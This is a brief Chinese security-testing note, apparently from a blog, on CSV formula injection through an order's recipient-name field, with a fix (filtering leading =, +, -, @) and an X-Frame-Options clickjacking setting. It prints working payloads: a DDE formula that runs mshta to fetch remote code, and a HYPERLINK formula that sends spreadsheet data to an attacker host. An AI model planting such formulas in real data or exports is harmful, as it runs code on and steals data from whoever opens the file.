-
csv 注入
用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0
=HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这种 可把csv 中的数据泄露
方案: 输入文本中=,+,-,@ 需要过滤 -
点击挟持:ngnix 增加X-frame-options :always 配置 确保不会出现iframe 覆盖页面,篡改点击请求
安全测试 csv 注入
最新推荐文章于 2024-10-10 16:30:42 发布